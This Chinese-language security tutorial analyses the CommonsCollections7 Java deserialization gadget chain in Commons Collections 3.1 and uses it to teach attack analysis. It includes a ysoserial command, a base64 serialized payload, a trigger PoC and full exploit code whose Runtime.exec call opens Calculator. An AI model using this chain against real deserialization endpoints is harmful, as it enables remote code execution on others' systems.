CommonsCollections7
触发POC
利用IDEA创建一个maven项目,导入依赖
<dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> </dependencies>利用新的ysoserial生成payload:
xxxxxxxxxxjava -jar ysoserial-master-SNAPSHOT.jar CommonsCollections7 'open /System/Applications/Calculator.app' |base64得到
xxxxxxxxxxrO0ABXNyABNqYXZhLnV0aWwuSGFzaHRhYmxlE7sPJSFK5LgDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAACHcIAAAACwAAAAJzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AFwAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+ABdzcQB+AA91cQB+ABQAAAACcHVxAH4AFAAAAAB0AAZpbnZva2V1cQB+ABcAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAUc3EAfgAPdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHB0AARleGVjdXEAfgAXAAAAAXEAfgAcc3EAfgAKc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAMdwgAAAAQAAAAAXQAAnl5cQB+AC94eHEAfgAvc3EAfgACcQB+AAdzcQB+ADA/QAAAAAAADHcIAAAAEAAAAAF0AAJ6WnEAfgAveHhzcQB+AC0AAAACeA==
这里用的jdk1.8.0_121
触发Poc:
ximport java.io.ByteArrayInputStream;import java.io.IOException;import java.io.ObjectInputStream;import java.util.Base64;public class Poc { public static void main(String[] args) throws IOException,ClassNotFoundException { String base64_exp = "BASE64_EXP"; byte[] exp = Base64.getDecoder().decode(base64_exp); ByteArrayInputStream bytes = new ByteArrayInputStream(exp); ObjectInputStream objectInputStream = new ObjectInputStream(bytes); objectInputStream.readObject(); }}
分析利用链
Step 0
入口点变为了java.util.Hashtable的readObject()
同CC6,这里key,value都可控
这里for循环作用是会把每个key-value利用reconstitutionPut(table, key, value)设置到table里
Step 1
reconstitutionPut(table, key, value)
看到1129行有个key.hashCode(),key又可控,立马想到CC6的利用链
先试一试能不能构造,确实可以:
xxxxxxxxxximport org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import java.lang.reflect.Field;import java.util.Hashtable;import java.util.Map;import org.apache.commons.collections.map.LazyMap;import org.apache.commons.collections.keyvalue.TiedMapEntry;import java.io.FileOutputStream;import java.io.ObjectOutputStream;public class Exp { public static void main(String[] args) throws Exception { ConstantTransformer Runtime_class = new ConstantTransformer(java.lang.Runtime.class); InvokerTransformer getMethod = new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[]{}}); InvokerTransformer invoke = new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{}}); InvokerTransformer exec = new InvokerTransformer("exec", new Class[]{String[].class}, new Object[]{new String[]{"/bin/bash", "-c","open /System/Applications/Calculator.app"}}); // 占位 Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; // 真正的RCE链 Transformer[] transformers = new Transformer[]{Runtime_class, getMethod, invoke, exec}; ChainedTransformer TransformerChain = new ChainedTransformer(fakeTransformers); Hashtable hashtable = new Hashtable(); Map lazyMap = LazyMap.decorate(hashtable, TransformerChain); TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "c014"); Hashtable hashtable2 = new Hashtable(1); hashtable2.put(tiedMapEntry,"zzz"); lazyMap.remove("c014"); // 赋值真的RCE链 Field iTransformersField = ChainedTransformer.class.getDeclaredField("iTransformers"); iTransformersField.setAccessible(true); iTransformersField.set(TransformerChain, transformers); ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("exp")); oos.writeObject(hashtable2); oos.close(); }}
然而CC7并非是这样,其是利用相对复杂的reconstitutionPut()中的e.key.equals(key)(key,value都可控)
Q: 这里有个hash & 0x7FFFFFFF,干啥用的?
A: 为了使index的第一位为0,也就是为了得到一个正数(有符号数第一位0代表正数,1代表负数)
可以看到要执行到这里e.hash需等于hash,e来自tab[index]
也就是说要触发到equals(key)必须使传入当前键与下一个键的hashCode()相同
恰好又存在这种情况,如cc和dD的hashCode()就是相同的
Step 2
接下来分析e.key.equals(key)的利用方式
要利用这个的话,首先e.key这里不能直接是cc或者dD字符串,而应该是一个可控的任意对象
利用的是LazyMap,所以e.key这里要是一个LazyMap对象,后文构造exp再细说
LazyMap其类中本身没有equals()方法
xxxxxxxxxxpublic class LazyMap extends AbstractMapDecorator implements Map, Serializable但其父类AbstractMapDecorator的equals()方法如下:
xxxxxxxxxxpublic boolean equals(Object object) { return object == this ? true : this.map.equals(object);}this.map来自LazyMap的构造方法(object就是上面的key,可控)
super(map)调用AbstractMapDecorator(Map map)
this.map这里利用链传入了HashMap,而HashMap中也没有equals(),最终是调用的HashMap的父类java.util.AbstractMap的equals()
Step 3
看到AbstractMap的equals()方法,其中又有m.get()
(m来自o,o就是上面的object,可控)
终究是回到了get()
构造EXP
Step 0
同之前EXP part 1:
xxxxxxxxxxConstantTransformer Runtime_class = new ConstantTransformer(java.lang.Runtime.class);InvokerTransformer getMethod = new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[]{}});InvokerTransformer invoke = new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{}});InvokerTransformer exec = new InvokerTransformer("exec", new Class[]{String[].class}, new Object[]{new String[]{"/bin/bash", "-c","open /System/Applications/Calculator.app"}});// 占位Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};// 真正的RCE链Transformer[] transformers = new Transformer[]{Runtime_class, getMethod, invoke, exec};ChainedTransformer TransformerChain = new ChainedTransformer(fakeTransformers);ChainedTransformer TransformerChain = new ChainedTransformer(fakeTransformers);
Step 1
上面说e.key这里不能直接是cc或者dD字符串,而应该是一个可控的LazyMap,设置2个lazyMap后其hashCode()还是相等吗?确实
EXP part 2:
xxxxxxxxxxMap map1 = new HashMap();Map map2 = new HashMap();Map lazyMap1 = LazyMap.decorate(map1, TransformerChain);lazyMap1.put("cc", 1);Map lazyMap2 = LazyMap.decorate(map2, TransformerChain);lazyMap2.put("dD", 1);
Step 2
接下来是要把2个lazyMap塞进Hashtable
EXP part 3:
xxxxxxxxxxHashtable hashtable = new Hashtable();hashtable.put(lazyMap1, 1);hashtable.put(lazyMap2, 2);
Step 3
但由于第二次put()后lazyMap2会多出一个cc键
同CC6,remove()即可
xxxxxxxxxxlazyMap2.remove("cc");// 赋值真的RCE链Field iTransformersField = ChainedTransformer.class.getDeclaredField("iTransformers");iTransformersField.setAccessible(true);iTransformersField.set(TransformerChain, transformers);ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("exp"));oos.writeObject(hashtable);oos.close();
整合EXP
xxxxxxxxxximport org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import java.lang.reflect.Field;import java.util.HashMap;import java.util.Hashtable;import java.util.Map;import org.apache.commons.collections.map.LazyMap;import org.apache.commons.collections.keyvalue.TiedMapEntry;import java.io.FileOutputStream;import java.io.ObjectOutputStream;public class Exp { public static void main(String[] args) throws Exception { ConstantTransformer Runtime_class = new ConstantTransformer(java.lang.Runtime.class); InvokerTransformer getMethod = new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[]{}}); InvokerTransformer invoke = new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{}}); InvokerTransformer exec = new InvokerTransformer("exec", new Class[]{String[].class}, new Object[]{new String[]{"/bin/bash", "-c","open /System/Applications/Calculator.app"}}); // 占位 Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; // RCE 链 Transformer[] transformers = new Transformer[]{Runtime_class, getMethod, invoke, exec}; ChainedTransformer TransformerChain = new ChainedTransformer(fakeTransformers); Map map1 = new HashMap(); Map map2 = new HashMap(); Map lazyMap1 = LazyMap.decorate(map1, TransformerChain); lazyMap1.put("cc", 2); Map lazyMap2 = LazyMap.decorate(map2, TransformerChain); lazyMap2.put("dD", 2); Hashtable hashtable = new Hashtable(); hashtable.put(lazyMap1, 2);// System.out.println(lazyMap1); {cc=2} hashtable.put(lazyMap2, 2);// System.out.println(lazyMap2); {dD=2, cc=1} lazyMap2.remove("cc"); // 赋值真的RCE链 Field iTransformersField = ChainedTransformer.class.getDeclaredField("iTransformers"); iTransformersField.setAccessible(true); iTransformersField.set(TransformerChain, transformers); ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("exp")); oos.writeObject(hashtable); oos.close(); }}